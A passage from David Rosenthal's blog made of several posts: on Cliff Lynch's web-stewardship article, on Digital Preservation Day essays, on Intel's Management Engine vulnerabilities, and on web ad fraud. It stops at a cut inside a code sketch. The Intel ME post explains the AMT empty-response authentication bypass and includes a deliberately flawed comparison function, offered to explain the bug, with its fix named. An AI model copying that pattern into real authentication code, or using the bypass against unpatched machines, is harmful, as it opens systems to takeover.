DSHR's Blog: I'm David Rosenthal, and this is a place to discuss the work I'm doing in Digital Preservation.<br /><br /><h2>Cliff Lynch's <i>Stewardship in the "Age of Algorithms"</i></h2>Cliff Lynch has just published a long and very important article at <i>First Monday</i> entitled <a href="http://dx.doi.org/10.5210/fm.v22i12.8097"><i>Stewardship in the "Age of Algorithms"</i></a>. It is a much broader look than my series <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-1.html"><i>The Amnesiac Civilization</i></a> at the issues around providing the future with a memory of today's society.<br /><br />Cliff accurately describes the practical impossibility of archiving systems such as Facebook that today form the major part of most people's information environment, and asks:<br /><blockquote class="tr_bq">If we abandon the ideas of archiving in the traditional preservation of an artifact sense, it’s helpful to recall the stewardship goal here to guide us: to capture the multiplicity of ways in which a given system behaves over the range of actual or potential users. ... Who are these “users” (and how many of them are there)? How do we characterize them, and how do we characterize system behavior?</blockquote>Then, with a tip of the hat to Don Waters, he notes that this problem is familiar in other fields:<br /><blockquote>they are deeply rooted in historical methods of anthropology, sociology, political science, ethnography and related humanistic and social science disciplines that seek to document behaviors that are essentially not captured in artifacts, and indeed to create such documentary artifacts</blockquote>Unable to archive the system they are observing, these fields try to record and annotate the experience of those encountering the system; to record the performance from the audience's point of view. Cliff notes, and discusses the many problems with, the two possible kinds of audience for "algorithms":<br /><ul><li>Programs, which he calls <i>robotic witnesses</i>, and others call <i>sock puppets</i>. Chief among the problems here is that "algorithms" need robust defenses against programs posing as humans (see, for example, spam, or fake news).</li><li>Humans, which he calls <i>New Nielsen Families</i>. Chief among the problems here is the detailed knowledge "algorithms" use to personalize their behaviors, leading to a requirement for vast numbers of humans to observe even somewhat representative behavior.</li></ul>Cliff concludes:<br /><blockquote class="tr_bq">From a stewardship point of view (seeking to preserve a reasonably accurate sense of the present for the future, as I would define it), there’s a largely unaddressed crisis developing as the dominant archival paradigms that have, up to now, dominated stewardship in the digital world become increasingly inadequate. ... the existing models and conceptual frameworks of preserving some kind of “canonical” digital artifacts ... are increasingly inapplicable in a world of pervasive, unique, personalized, non-repeatable performances.
As stewards and stewardship organizations, we cannot continue to simply complain about the intractability of the problems or speak idealistically of fundamentally impossible “solutions.”<br />...<br />If we are to successfully cope with the new “Age of Algorithms,” our thinking about a good deal of the digital world must shift from artifacts requiring mediation and curation, to experiences. Specifically, it must focus on making pragmatic sense of an incredibly vast number of unique, personalized performances (including interaction with the participant) that can potentially be recorded or otherwise documented, or at least do the best we can with this.</blockquote>I agree that society is facing a crisis in its ability to remember the past. Cliff has provided a must-read overview of the context in which the crisis has developed, and some pointers to pragmatic if unsatisfactory ways to address it. What I would like to see is an even broader view, describing this crisis as one among many caused by the way increasing returns to scale are squeezing out the redundancy essential to a resilient civilization.<br /><br />David.<br /><br /><h2>International Digital Preservation Day</h2>The Digital Preservation Coalition's <i>International Digital Preservation Day</i> was marked by a <a href="http://www.dpconline.org/blog/idpd?filter_tag[0]=">wide-ranging collection of blog posts</a>. Below the fold, some links to, and comments on, a few of them.<br /><br />Susan Reilly's <a href="http://www.dpconline.org/blog/idpd/we-need-to-talk-about-copyright"><i>We need to talk about copyright</i></a> makes good points about the importance of copyright for preservation, in the context of Article 5 of the proposed EU Directive on Copyright in the Digital Single Market:<br /><blockquote class="tr_bq">This article recognises the fact that a single copy is not sufficient for digital preservation and that it is necessary to [make] multiple copies. It also allows for format shifting. The proposed directive also has a provision on technical protection measures but does not go far enough in providing a mechanism for recourse should rights owners not cooperate in allowing cultural heritage institutes to circumvent these measures for the purpose of preservation.</blockquote>I agree that "recourse" would be good were it practical, but the idea of libraries suing publishers to obtain access isn't. Let's talk David vs. Goliath in terms of resources.
A more realistic approach is to recognize that DRM technologies will be cracked, and to provide libraries with immunity for using tools from the "dark web" to remove DRM.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.dpconline.org/images/DPC/Blog/IDPD17/Cochrane_5.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://www.dpconline.org/images/DPC/Blog/IDPD17/Cochrane_5.gif" data-original-height="652" data-original-width="464" height="200" width="141" /></a></div>Euan Cochrane's <a href="http://www.dpconline.org/blog/idpd/the-emergence-of-digital-patinas"><i>The Emergence of "Digital Patinas"</i></a> is a great argument for emulation:<br /><blockquote class="tr_bq">As software preservation and emulation is becoming more readily accessible, thanks to the work of the <a href="https://web.archive.org/web/20160116221343/http:/www.keep-project.eu/ezpub2/index.php">KEEP project</a>, <a href="https://blog.archive.org/category/emulation/">the Internet Archive</a>, <a href="http://www.dpconline.org/bw-fla.uni-freiburg.de">the bwFLA project</a>, and many others, we’re beginning to see the emergence of a phenomenon whereby digital objects are displaying something that seems strikingly similar to physical patinas. Something perhaps best described as a “digital patina”.</blockquote>I especially like the example of the infuriating Clippy.<br /><br />I strongly disagree with Duff Johnson's <a href="http://www.dpconline.org/blog/idpd/the-only-archival-digital-document-format"><i>The only archival digital format</i></a>. He writes:<br /><blockquote class="tr_bq">PDF’s purpose is to be a document, with all that implies (see above). But that’s not the purpose of HTML. <a href="https://www.pdfa.org/the-power-of-the-page/">HTML isn’t a document, it’s an experience.</a> HTML is about making and consuming; PDF is how you keep it, and PDF/A is how you keep it forever (preserving the file’s actual bytes, of course, is up to you).</blockquote>There are at least three big problems with this. First, PDF/A does not preserve all aspects of a document; PDF has many document capabilities that PDF/A excludes. Second, but more important, digital preservation is about preserving the experience! Documents are a small and decreasing proportion of the digital content that needs to be preserved. Third, the idea that the choice of a format is what digital preservation is all about might have been true two decades ago, but <a href="http://blog.dshr.org/2015/11/emulation-virtualization-as.html">it is a red herring today</a>.<br /><br />David Minor's <a href="http://www.dpconline.org/blog/idpd/what-we-ve-done-well"><i>What we’ve done well, and some things we still need to figure out</i></a> ends with <a href="http://blog.dshr.org/2017/08/preservation-is-not-technical-problem.html">a point I've made repeatedly</a>:<br /><blockquote><b>Funding</b>. Yes. Of course. Funding. Funding funding funding. This is the largest single mountain we still have to climb. Digital preservation, done correctly, is expensive. It just is. And it’s not a problem that technology is going to solve. Or some new whiz bang economic theory that makes sense to twelve special people. It’s only going to cease being a problem when the people who care about their precious bits fully understand why it’s expensive, and make the commitment to support it. This is the ur-issue for our field, and has been since the beginning. 
</blockquote>Eld Zierau's <a href="http://www.dpconline.org/blog/idpd/bit-preservation-is-not-a-question-of-technology"><i>Bit Preservation is NOT a Question of Technology!</i></a> raises the other big non-technical aspect of preservation: the organizational one. She stresses the need for auditing to ensure that organizations are actually delivering on the contracts they enter into:<br /><blockquote>The experience in Denmark is that we cannot rely on audit certifications. There needs to be specific audits that ensure that the contracts are followed, but also to sharpen contracts in cases where we have discovered risks that were not covered before (for example, time lap[se] from data arriving to an offline tape replica unit until it is finally written and securely locked away). The experience is also that many organisations are reluctant to allow audits to be performed in their organisation.</blockquote>Which, of course, raises the issue of the <a href="https://documents.clockss.org/index.php?title=LOCKSS:_Polling_and_Repair_Protocol">technology to support auditing</a>.<br /><br />Richard Wright's <a href="http://www.dpconline.org/blog/idpd/the-future-of-television-archives"><i>The Future Of Television Archives</i></a> makes two important points:<br /><blockquote class="tr_bq">While drama and entertainment programmes are kept for repeats and for sale to other countries, factual content is heavily recycled to add depth and interest to current programmes. In the BBC, about 30 to 40 percent of 'the news' is actually archive material. ... Up to 2010, about 20% of the BBC television archive was accessed each year, and 95% of that use was internal: back into the BBC for adding depth to new programmes. The other 5% was commercial use.</blockquote>And, of particular importance for efforts such as the <a href="https://archive.org/details/tv">Internet Archive's TV collection</a>:<br /><blockquote class="tr_bq">Off-air recordings are fine for viewing copies, but have real quality limitations when it comes to re-purposing the content for new programmes. The video signal for satellite transmission is compressed by a factor of 10 to 20. This is lossy compression, meaning original quality is not recoverable. ...<br /><br />Who cares? The future will care. Lossy compression today leads to 'cascaded compression' in the future, when material is recoded to new standards. Decades of experience show that there is a great risk when cascading: eventually there will be significant failures. ... transcoding errors and cascaded quality loss are the time bomb ticking in all archives containing content with lossy compression – meaning all off-air archives.<br /><br />In addition, professional TV archives no longer get as much master material as they used to. In 1980 the BBC made about 90% of its output in-house, so the archive could get 'the master tape'. Now that figure has been cut to 30%. ...
The future of master quality (production quality) video content is very much in doubt.</blockquote>Yvonne Tunnat's <a href="http://www.dpconline.org/blog/idpd/plans-are-my-reality"><i>Plans are my reality</i></a> is the sad story of someone for whom reading a <a href="http://blog.dshr.org/2009/01/postels-law.html">post on my blog from 2009</a> could have saved a whole lot of work:<br /><blockquote>My preservation plan was as following:<br /><ol><li>Gather all bad PDF</li><li>Migrate them to good PDF</li><li>Check if they still look alike</li></ol></blockquote>The fact that "bad" and "good" PDFs looked the same is an example of <a href="http://blog.dshr.org/2009/01/postels-law.html">Postel's Law</a>, especially since:<br /><blockquote>The bad-to-good migration tool built by my co-worker turned out to be too basic, just putting the bad PDF pages into a new PDF, which then would be considered ok by JHOVE, which only checks the overall structure.</blockquote>David.<br /><br /><h2>Intel's "Management Engine"</h2>Back in May Erica Portnoy and Peter Eckersley, writing for the EFF's Deep Links blog, <a href="https://www.eff.org/deeplinks/2017/05/intels-management-engine-security-hazard-and-users-need-way-disable-it">summed up the situation in a paragraph</a>:<br /><blockquote class="tr_bq">Since 2008, most of Intel’s <a href="https://www.eff.org/deeplinks/2017/05/intels-management-engine-security-hazard-and-users-need-way-disable-it#update-5-12">chipsets</a> have contained a tiny homunculus computer called the “Management Engine” (ME). The ME is a largely undocumented master controller for your CPU: it works with system firmware during boot and has direct access to system memory, the screen, keyboard, and network. All of the code inside the ME is secret, signed, and tightly controlled by Intel. ... there is presently no way to disable or limit the Management Engine in general. Intel urgently needs to provide one.</blockquote>Recent events have pulled back the curtain somewhat and revealed that things are worse than we knew in May. Below the fold, some details.<br /><br />Concern about the ME goes back further. Sparked by a talk given at the Chaos Communication Congress by <a href="https://hackaday.com/2015/12/28/32c3-towards-trustworthy-x86-laptops/">Joanna Rutkowska of the Qubes OS project</a>, back in January 2016 <a href="https://hackaday.com/2016/01/22/the-trouble-with-intels-management-engine/">Brian Benchoff at <i>Hackaday</i> wrote</a>:<br /><blockquote class="tr_bq">Extremely little is known about the ME, except for some of its capabilities. The ME has complete access to all of a computer’s memory, its network connections, and every peripheral connected to a computer. It runs when the computer is hibernating, and can intercept TCP/IP traffic. Own the ME and you own the computer.<br /><br />There are no known vulnerabilities in the ME to exploit right now: we’re all locked out of the ME. But that is security through obscurity. Once the ME falls, everything with an Intel chip will fall. It is, by far, the scariest security threat today, and it’s one that’s made even worse by our own ignorance of how the ME works.</blockquote>The EFF's post was a reaction to the discovery of a vulnerability in one of the modules that run on the ME, Intel's Active Management Technology (AMT) admin tool.
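<br /><br />Public write-ups of this bug (CVE-2017-5689) reported that the AMT firmware checked the HTTP Digest response against only as many characters as the attacker supplied, a strncmp-style mistake. A minimal sketch of that class of bug, in TypeScript for legibility; all the names are mine, since Intel's actual firmware is closed source:<br /><pre><code>// Sketch of the reported comparison bug: the C original was
// effectively strncmp(expected, supplied, strlen(supplied)),
// which compares zero characters when the attacker sends an
// empty response. Hypothetical reconstruction, not Intel's code.
function checkDigestResponse(expected: string, supplied: string): boolean {
  for (let i = 0; i &lt; supplied.length; i++) {
    if (expected[i] !== supplied[i]) {
      return false;
    }
  }
  return true; // supplied === "" never enters the loop: always "valid"
}

// An empty response "matches" any expected digest:
console.log(checkDigestResponse("a94f5374fce5edbc8e2a8697c1533167", ""));
// prints: true
</code></pre>The fix is to compare the full length of the expected digest, ideally in constant time.<br /><br />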
<a href="https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/">Chris Williams at <i>The Register</i> explains</a>: <br /><blockquote class="tr_bq">Intel provides a remote management toolkit called AMT for its business and enterprise-friendly processors; this software is part of <a href="https://www.theregister.co.uk/2011/11/04/desktop_management/" target="_blank">Chipzilla's vPro suite</a> and runs at the firmware level, below and out of sight of Windows, Linux, or whatever operating system you're using. The code runs on Intel's Management Engine, a tiny secret computer within your computer that has full control of the hardware and talks directly to the network port, allowing a device to be remotely controlled regardless of whatever OS and applications are running, or not, above it.<br /><br />Thus, AMT is designed to allow IT admins to remotely log into the guts of computers so they can reboot a knackered machine, repair and tweak the operating system, install a new OS, access a virtual serial console, or gain full-blown remote desktop access via VNC. It is, essentially, god mode.<br /><br />Normally, AMT is password protected. This week it emerged <a href="https://www.theregister.co.uk/2017/05/01/intel_amt_me_vulnerability/" target="_blank">this authentication can be bypassed</a>, potentially allowing miscreants to take over systems from afar or once inside a corporate network. This critical security bug was designated <a href="https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr" rel="nofollow" target="_blank">CVE-2017-5689</a>. While Intel has patched its code, people have to pester their hardware suppliers for the necessary updates before they can be installed.</blockquote>The <a href="https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/">vulnerability was embarrassing</a>:<br /><blockquote class="tr_bq">AMT is accessed over the network via a bog-standard web interface: the service listens on ports 16992 and 16993. Visiting this with a browser brings up a prompt for a password, and this passphrase is sent using standard <a href="https://www.ietf.org/rfc/rfc2617.txt" rel="nofollow" target="_blank">HTTP Digest</a> authentication: the username and password are hashed using a nonce from the AMT firmware plus a few other bits of metadata. This scrambled response is checked by the AMT software to be valid, and if so, access is granted to the management interface.<br /><br />But if you send an empty response, the firmware is fooled into thinking this is correct and lets you through. </blockquote>Intel patched it, but it took a while for the patch to filter through to the system vendors and to get installed on the millions of vulnerable CPUs in the field. Meanwhile, an incredible number of systems were vulnerable to being remotely pwned.<br /><br />Then, in late September <a href="https://www.theregister.co.uk/2017/09/26/intel_management_engine_exploit/">Richard Chirgwin at <i>The Register</i> reported that</a>:<br /><blockquote class="tr_bq">Positive Technologies researchers say the exploit “allows an attacker of the machine to run unsigned code in the Platform Controller Hub on any motherboard via Skylake+”.<br />...<br />For those whose vendors haven't pushed a firmware patch for AMT, in August Positive Technologies discovered how to <a href="https://www.theregister.co.uk/2017/08/29/intel_management_engine_can_be_disabled/" rel="nofollow" target="_blank">switch off Management Engine</a>.<br />... 
<br />What the company's researchers Mark Ermolov and Maxim Goryachy discovered is that when Intel switched Management Engine to a modified Minix operating system, it introduced a vulnerability in an unspecified subsystem.<br /><br />Because ME runs independently of the operating system, a victim's got no way to know they were compromised, and infection is “resistant” to an OS re-install and BIOS update, Ermolov and Goryachy say.</blockquote><a href="https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/">More details emerged two weeks ago</a>:<br /><blockquote class="tr_bq">Positive has confirmed that recent revisions of Intel's Management Engine (IME) feature Joint Test Action Group (<a href="https://www.xjtag.com/about-jtag/jtag-high-level-guide/" rel="nofollow" target="_blank">JTAG</a>) debugging ports that can be reached over USB. JTAG grants you pretty low-level access to code running on a chip, and thus we can now delve into the firmware driving the Management Engine. ... There have been long-running fears IME is insecure, which is not great as it's built right into the chipset: it's a black box of exploitable bugs, as <a href="https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/" rel="nofollow" target="_blank">was confirmed in May</a> when researchers noticed you could administer the Active Management Technology software suite running on the microcontroller with an empty credential string over a network.</blockquote><a href="https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/">Positive discovered that</a>:<br /><blockquote class="tr_bq">since Skylake, Intel's Platform Controller Hub, which manages external interfaces and communications, has offered USB access to the engine's JTAG interfaces. The new capability is DCI, aka Direct Connect Interface.<br /><br />Aside from any remote holes found in the engine's firmware code, any attack against IME needs physical access to a machine's USB ports which as we know is <a href="https://www.theregister.co.uk/2016/04/11/half_plug_in_found_drives/" rel="nofollow" target="_blank">really difficult</a>.</blockquote><a href="https://www.youtube.com/watch?v=iffTJ1vPCSo">Google's Ronald Minnich reported</a> that running on the ME was a <a href="https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/">well-known open source operating system, MINIX</a>:<br /><blockquote class="tr_bq">And it turns out that while Intel talked to MINIX's creator about using it, the tech giant never got around to saying it had put it into recent CPU chipsets it makes.<br /><br />Which has the permissively licensed software's granddaddy, Professor Andrew S. Tanenbaum, just a bit miffed. As Tanenbaum <a href="http://www.cs.vu.nl/~ast/intel/" target="_blank">wrote</a> this week in an open letter to Intel CEO Brian Krzanich: <br /><blockquote>The only thing that would have been nice is that after the project had been finished and the chip deployed, that someone from Intel would have told me, just as a courtesy, that MINIX was now probably the most widely used operating system in the world on x86 computers. That certainly wasn't required in any way, but I think it would have been polite to give me a heads up, that's all.</blockquote></blockquote><a href="http://www.tomshardware.com/news/google-removing-minix-management-engine-intel,35876.html">Google isn't happy about this</a>:<br /><blockquote class="tr_bq">What’s concerning Google is the complexity of the ME. ...
The real focus, though, is what’s in it and the consequences. According to Minnich, that list includes web server capabilities, a file system, drivers for disk and USB access, and, possibly, some hardware DRM-related capabilities. ... An OS full of latent capabilities to access hardware is just giving those people more room to be creative. The possibilities of what could happen if attackers figure out how to load their own software onto the ME’s OS are endless. Minnich and his team (and a number of others) are interested in removing ME to limit potential attackers’ capabilities.</blockquote>And, as one should have expected, once Intel took a look at the problem they found it was <a href="https://arstechnica.com/information-technology/2017/11/intel-warns-of-widespread-vulnerability-in-pc-server-device-firmware/">much worse than initially reported</a>:<br /><blockquote>Intel has <a href="https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&amp;languageid=en-fr">issued a security alert</a> that management firmware on a number of recent PC, server, and Internet-of-Things processor platforms are vulnerable to remote attack. Using the vulnerabilities, the most severe of which was uncovered by Mark Ermolov and Maxim Goryachy of Positive Technologies Research, remote attackers could launch commands on a host of Intel-based computers, including laptops and desktops shipped with Intel Core processors since 2015. They could gain access to privileged system information, and millions of computers could essentially be taken over as a result of the bug. Most of the vulnerabilities require physical access to the targeted device, but one allows remote attacks with administrative access.</blockquote>Google, and anyone running a data center, clearly needs an equivalent of the remote access capabilities AMT provides. For the rest of us, <a href="https://puri.sm/posts/purism-librem-laptops-completely-disable-intel-management-engine/"><i>Purism Librem Laptops Completely Disable Intel’s Management Engine</i></a>:<br /><blockquote>“Disabling the Management Engine, long believed to be impossible, is now possible and available in all current Librem laptops, it is also available as a software update for previously shipped recent Librem laptops.” says Todd Weaver, Founder &amp; CEO of Purism.<br />...<br />Disabling the Management Engine is no easy task, and it has taken security researchers years to find a way to properly and verifiably disable it. Purism, because it runs coreboot and maintains its own BIOS firmware update process, has been able to release and ship coreboot that disables the Management Engine from running, directly halting the ME CPU without the ability of recovery.</blockquote>What does all this mean? It means physical security of "Intel inside" computers is really important, since they are all vulnerable to a really hard to detect version of the <a href="https://security.stackexchange.com/questions/159173/what-exactly-is-an-evil-maid-attack">"Evil Maid Attack"</a>:<br /><blockquote>"Evil maid" attacks can be anything that is done to a machine via physical access while it is turned off, even though it's encrypted.
The name comes from the idea that an attacker could infiltrate or pay off the cleaning staff wherever you're staying to compromise your laptop while you're out.</blockquote>Since effective physical security for laptops is impossible, this means that any network to which laptops can be connected has to assume that one of them may be infected at a level that cannot be detected by any software running on the CPU, and that this infection may be a threat to other machines on the network.<br /><br />Although I didn't know about the ME issues when I <a href="http://blog.dshr.org/2017/10/crowdfunding.html">crowdfunded</a> <a href="https://www.crowdsupply.com/design-shift/orwl">ORWL</a>, they are a good reason for having done so.<br /><br />David.<br /><br /><h2>Has Web Advertising Jumped The Shark?</h2>The Web runs on advertising. Has Web advertising jumped the shark? The <a href="https://en.wikipedia.org/wiki/Jumping_the_shark">relevant Wikipedia article says</a>:<br /><blockquote>The usage of "jump the shark" has subsequently broadened beyond television, indicating the moment when a brand, design, franchise, or creative effort's evolution declines, or when it changes notably in style into something unwelcome.</blockquote>There are four big problems with Web advertising as it currently exists:<br /><ol><li>Bad guys love it.</li><li>Readers hate it.</li><li>Webmasters hate it.</li><li>Advertisers find it wastes money.</li></ol>#4 just might have something to do with #3, #2 and #1. It seems that there's a case to be made. Below the fold I try to make it.<br /><br /><h3>Bad guys love it</h3>There are at least three major, and one so far minor, business opportunities for the bad guys in Web advertising:<br /><ul><li>Fraud</li><li>Malvertising</li><li>Domain spoofing</li><li>Cryptojacking</li></ul>They're all enabled by the fact that, as blissex wrote in <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html?showComment=1508358199672#c8289190784291053547">this comment</a>, we are living:<br /><blockquote>In an age in which every browser gifts a free-to-use, unlimited-usage, fast VM to every visited web site, and these VMs can boot and run quite responsive 3D games or Linux distributions</blockquote><h4>Fraud</h4>In 2015 George Slefo at <i>Ad Age</i> <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">reported that:</a><br /><blockquote>As digital spend continues to reach landmark highs -- it hit $27.5 billion for the first half of 2015 -- so does ad fraud, which is now estimated to cost the industry about $18.5 billion annually, according to a report released Thursday by Distil Networks.<br /><br />That means for every $3 spent, $1 is going to ad fraud.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-6cvgrUKxuvI/WgY4_Ys2yKI/AAAAAAAAEBA/SdBat4iOtvEQWIs1QoKgjwcUSeL4AQmTACLcBGAs/s1600/BotTraffic.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="317" data-original-width="309" height="200" src="https://2.bp.blogspot.com/-6cvgrUKxuvI/WgY4_Ys2yKI/AAAAAAAAEBA/SdBat4iOtvEQWIs1QoKgjwcUSeL4AQmTACLcBGAs/s200/BotTraffic.png"
width="194" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.bloomberg.com/features/2015-click-fraud/">Source</a></td></tr></tbody></table>A long 2015 report from <a href="https://www.bloomberg.com/features/2015-click-fraud/">a team at Bloomberg</a> took off from <a href="http://www.marketing.org/pcontent/show/id/rr-2015-bot-baseline">this study</a>:<br /><blockquote>A study done last year in conjunction with the Association of National Advertisers embedded billions of digital ads with code designed to determine who or what was seeing them. Eleven percent of display ads and almost a quarter of video ads were "viewed" by software, not people. According to the ANA study, which was conducted by the security firm White Ops and is titled The Bot Baseline: Fraud In Digital Advertising, fake traffic will cost advertisers $6.3 billion this year.<br /><br />One ad tracked in the study was a video spot for Chrysler that ran last year on Saveur.tv, a site based on the food and travel lifestyle magazine. Only 2 percent of the ad views registered as human, according to a person who was briefed on data provided to the study's participants. </blockquote>Note the roughly 3x difference in the 2015 estimates of fraud; from <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">$18.5B</a> to <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">$6.3B</a> in a <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">$55B</a> industry, or between 34% and 11%. This suggests that researchers have only a vague idea of the scale of the problem, but even the low estimate would put ad fraud as a company in the bottom half of the S&amp;P 500. Other estimates are in the same range. For example, at <i>The Register</i> <a href="https://www.theregister.co.uk/2017/08/17/ad_fraud_looks_really_bad/" rel="nofollow">Thomas Claburn writes</a>:<br /><blockquote class="tr_bq">'It's about 60 to 100 per cent fraud, with an average of 90 per cent, but it is not evenly distributed,' said Augustine Fou, an independent ad fraud researcher, in <a href="https://www.slideshare.net/augustinefou/state-of-digital-ad-fraud-august-2017" rel="nofollow">a report</a> published this month.<br /><br />... Among quality publishers, Fou reckons $1 spent buys $0.68 in ads actually viewed by real people. But on ad networks and open exchanges, fraud is rampant.<br /><br />With ad networks, after fees and bots – which account for 30 per cent of traffic – are taken into account, $1 buys $0.07 worth of ad impressions viewed by real people. With open ad exchanges – where bots make up 70 per cent of traffic – that figure is more like $0.01. In other words, web adverts displayed via these networks just aren't being seen by actual people, just automated software scamming advertisers. </blockquote>The ANA report covered the full range of ad fraud but focused on <a href="https://en.wikipedia.org/wiki/Click_fraud">click fraud, which Wikipedia defines thus</a>:<br /><blockquote><b>Click fraud</b> is a type of fraud that occurs on the Internet in pay-per-click (PPC) online advertising. In this type of advertising, the owners of websites that post the ads are paid an amount of money determined by how many visitors to the sites click on the ads. 
Fraud occurs when a person, automated script or computer program imitates a legitimate user of a web browser, clicking on such an ad without having an actual interest in the target of the ad's link.</blockquote>The study is now annual; the <a href="http://www.ana.net/content/show/id/botfraud-2017">2017 edition reported that</a>:<br /><blockquote>The third annual Bot Baseline Report reveals that the economic losses due to bot fraud are estimated to reach $6.5 billion globally in 2017. This is down 10 percent from the $7.2 billion reported in last year's study. The fraud decline is particularly impressive recognizing that this is occurring when digital advertising spending is expected to increase by 10 percent or more.</blockquote>Nevertheless, at least a gross $6.5B/year is flowing to the bad guys. Not bad for a high-margin business.<br /><h4>Malvertising</h4><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-6ciBET60O7k/Wgkf-GsW1-I/AAAAAAAAECM/D01ZigbP8ikS9Uef_kBfMfpqBJ0Dpg-CwCLcBGAs/s1600/exploit-kit-evolution.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="433" data-original-width="600" height="143" src="https://2.bp.blogspot.com/-6ciBET60O7k/Wgkf-GsW1-I/AAAAAAAAECM/D01ZigbP8ikS9Uef_kBfMfpqBJ0Dpg-CwCLcBGAs/s200/exploit-kit-evolution.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-evolution-of-exploit-kits.pdf">Source</a></td></tr></tbody></table>Web advertising is a channel by which web sites deliver third-party content to browsers. Sites generally have little control over this third-party content. So bad guys can use the Web advertising channel directly, or by compromising an ad supplier, to deliver malware. This is called malvertising. Malware such as <a href="https://heimdalsecurity.com/blog/ultimate-guide-angler-exploit-kit-non-technical-people/">Angler</a> has been disseminated via <a href="https://blog.malwarebytes.org/threat-analysis/2016/03/large-angler-malvertising-campaign-hits-top-publishers/">even the most prominent web sites</a>:<br /><blockquote>However, out of the blue on the weekend we witnessed a huge spike in malicious activity emanating out of two suspicious domains.
Not only were there a lot of events, but they also included some very high profile publishers, which is something we haven’t seen in a while:<br /><table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="height: 289px; width: 331px;"><tbody><tr><td><b>Publisher</b></td><td><b>Traffic (monthly)*</b></td></tr><tr><td>msn.com</td><td>1.3B</td></tr><tr><td>nytimes.com</td><td>313.1M</td></tr><tr><td>bbc.com</td><td>290.6M</td></tr><tr><td>aol.com</td><td>218.6M</td></tr><tr><td>my.xfinity.com</td><td>102.8M</td></tr><tr><td>nfl.com</td><td>60.7M</td></tr><tr><td>realtor.com</td><td>51.1M</td></tr><tr><td>theweathernetwork.com</td><td>43M</td></tr><tr><td>thehill.com</td><td>31.4M</td></tr><tr><td>newsweek.com</td><td>9.9M</td></tr></tbody></table></blockquote>Or more recently, <a href="https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/">this campaign</a>:<br /><blockquote class="tr_bq">RoughTed is a large malvertising operation that peaked in March 2017 but has been going on for at least well over a year. It is unique for its considerable scope ranging from scams to exploit kits, targeting a wide array of users via their operating system, browser, and geolocation to deliver the appropriate payload.</blockquote>Which is <a href="https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/">very sophisticated</a>:<br /><blockquote class="tr_bq">Another interesting aspect is that redirections to RoughTed domains seem to happen even to those running ad-blockers and that was reported by users of <a href="https://github.com/jspenguin2017/AdBlockProtector/issues/157" rel="noopener noreferrer" target="_blank">Adblock Plus</a>, <a href="https://github.com/uBlockOrigin/uAssets/issues/389" rel="noopener noreferrer" target="_blank">uBlock origin</a> or <a href="https://forum.adguard.com/index.php?threads/resolved-userscloud-com-missed-popups.19868/" rel="noopener noreferrer" target="_blank">AdGuard</a>.</blockquote>Thus readers don't merely use ad-blockers to retain control over their user experience, prevent tracking and economize on bandwidth, but also to reduce their risk of infection by malware.<br /><h4>Domain Spoofing</h4><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-oBRvvU1pjMQ/WCYJF4wmsfI/AAAAAAAADWM/xEMY6vxaqIAieYZLRl4CUYkPjrFZnf4zgCPcBGAYYCw/s1600/AdNetworks.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="112" src="https://2.bp.blogspot.com/-oBRvvU1pjMQ/WCYJF4wmsfI/AAAAAAAADWM/xEMY6vxaqIAieYZLRl4CUYkPjrFZnf4zgCPcBGAYYCw/s200/AdNetworks.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm">Source</a></td></tr></tbody></table>Most advertisers buy their space on web sites via <i>exchanges</i>, real-time auction systems that connect space sellers (web sites) with space buyers (advertisers). Maciej Cegłowski described the baroque complexity of this system in <a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm"><i>What Happens Next Will Amaze You</i></a>.
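<br /><br />One reason the trickery works is that, in the OpenRTB-style bid requests flowing through these exchanges, the seller itself declares which site the ad slot is on, and buyers have little means of verifying the claim. A minimal sketch of such a request; the field names follow the OpenRTB convention, but the request itself is invented:<br /><pre><code>// A stripped-down OpenRTB-style bid request, as a seller submits it
// to an exchange. Every field here is self-declared by the seller.
interface BidRequest {
  id: string;
  imp: { id: string; banner: { w: number; h: number } }[];
  site: { domain: string; page: string };
}

// Nothing in the protocol stops a fraudster from claiming a premium
// publisher's domain for inventory that renders somewhere else entirely.
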